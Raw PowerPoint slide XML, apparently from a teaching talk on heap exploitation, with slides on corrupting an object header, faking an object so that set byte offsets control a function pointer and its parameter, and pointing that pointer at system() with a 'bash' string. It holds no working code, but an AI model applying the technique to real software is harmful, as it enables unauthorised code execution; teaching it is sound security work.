              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B3C2D9-D129-AE42-976A-E3E1AA39DE76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4698564" y="2666038"/>
            <a:ext cx="436538" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6B186F6-BA3B-764B-B95B-5C48F04BF0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7461457" y="1320484"/>
            <a:ext cx="1508507" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>40/0x28</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Total</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06CE62DE-31B0-9147-8C81-50EE975A28FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3138407" y="2666038"/>
            <a:ext cx="1557571" cy="23083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5EDF2B-D150-0A41-8627-DC8B3313A072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511085" y="2468014"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B0E7A3E-BA1C-AE47-9957-4EEB14B3FF28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205568" y="1417789"/>
            <a:ext cx="1495582" cy="20865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6B87C3B-F2A9-794D-9942-42852A8D7FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538208" y="1218889"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Parameter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14763340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4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39"/>
            <a:ext cx="3370649" cy="1770131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Other object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>writes its data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Corrupts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> along the way</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9" name="Picture 8" descr="Chart, bar chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F330EFE4-D847-C74B-BAB0-A0AB5F2519B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3245000" y="1268019"/>
            <a:ext cx="5727770" cy="3325801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18959998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D029-72AF-F544-9B74-483DFF756257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake Object Creation - Alignments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91E594-6259-F248-9780-86F81A9589B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1173263"/>
            <a:ext cx="4445108" cy="2255891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text, chat or text message&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7879EF13-F968-124A-9DE9-E0A06E056083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1616809"/>
            <a:ext cx="4317183" cy="1358424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37BA31D-65AB-E840-B79E-62908F86CFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4206580" y="1649930"/>
            <a:ext cx="959757" cy="8605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EBFA39-ACCB-464E-BDE0-DB9CCB76963C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3138407" y="1985527"/>
            <a:ext cx="202793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1C3AF71-CADD-3E40-9847-2E7773211D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4282598" y="2269868"/>
            <a:ext cx="88373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A91402-71D6-2B49-B4F5-027CAA5568EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3138407" y="2510725"/>
            <a:ext cx="2027930" cy="6102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D483037-D997-3F42-A82E-6FEAC46D46D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4282598" y="2798941"/>
            <a:ext cx="883739" cy="8600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BFACCF7-2465-DD41-9C91-7B33AD260585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7949210" y="1807088"/>
            <a:ext cx="254143" cy="96991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30A6EC6-E916-474C-95AC-28B483563A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7273549" y="1521977"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC39086-5783-9A42-B4E1-48E7A1FF7752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6695919" y="1424940"/>
            <a:ext cx="577630" cy="20183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553C1BA-9891-5345-8950-9EA16B810F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7188748" y="1120670"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First Parameter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E4C207-57A1-E74E-BE0B-31E64EE0BB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126892" y="3380279"/>
            <a:ext cx="8388460" cy="124411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Bytes 0x20-0x27 control the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>function pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bytes 0x0-0x7 control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All we care about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Need alignments though</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1666121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24B93-33A9-004E-AB2F-83362860D397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="342900"/>
            <a:ext cx="2949178" cy="1200150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What to Call?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="Who ya gonna call? Ghostbusters T-Shirt - 80's T-Shirt">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C55C391-9268-4642-AB8D-9162872F63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5550" y="741757"/>
            <a:ext cx="3655219" cy="3655219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEDD5753-7050-03A7-F5E6-54A3C8C2152A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629840" y="1543052"/>
            <a:ext cx="4140200" cy="2858691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function pointer – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Parameter – pointer to a string with bash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="System as the function pointer.&#10;- https://man7.org/linux/man-pages/man3/system.3.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D1C203-0F49-1E45-98AF-809B745BBC13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="629839" y="3974861"/>
            <a:ext cx="8182075" cy="1079231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40220409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D029-72AF-F544-9B74-483DFF756257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake Object Creation - Alignments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91E594-6259-F248-9780-86F81A9589B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1173263"/>
            <a:ext cx="4445108" cy="2255891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text, chat or text message&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7879EF13-F968-124A-9DE9-E0A06E056083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1616809"/>
            <a:ext cx="4317183" cy="1358424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37BA31D-65AB-E840-B79E-62908F86CFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4206580" y="1649930"/>
            <a:ext cx="959757" cy="8605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EBFA39-ACCB-464E-BDE0-DB9CCB76963C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4282598" y="1985527"/>
            <a:ext cx="88373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1C3AF71-CADD-3E40-9847-2E7773211D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4282598" y="2269868"/>
            <a:ext cx="88373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A91402-71D6-2B49-B4F5-027CAA5568EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4317183" y="2571750"/>
            <a:ext cx="84915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D483037-D997-3F42-A82E-6FEAC46D46D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4282598" y="2798941"/>
            <a:ext cx="883739" cy="8600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BFACCF7-2465-DD41-9C91-7B33AD260585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7949210" y="1807088"/>
            <a:ext cx="254143" cy="96991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30A6EC6-E916-474C-95AC-28B483563A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7761746" y="1497024"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC39086-5783-9A42-B4E1-48E7A1FF7752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6695919" y="1424940"/>
            <a:ext cx="577630" cy="20183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553C1BA-9891-5345-8950-9EA16B810F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7188748" y="1120670"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
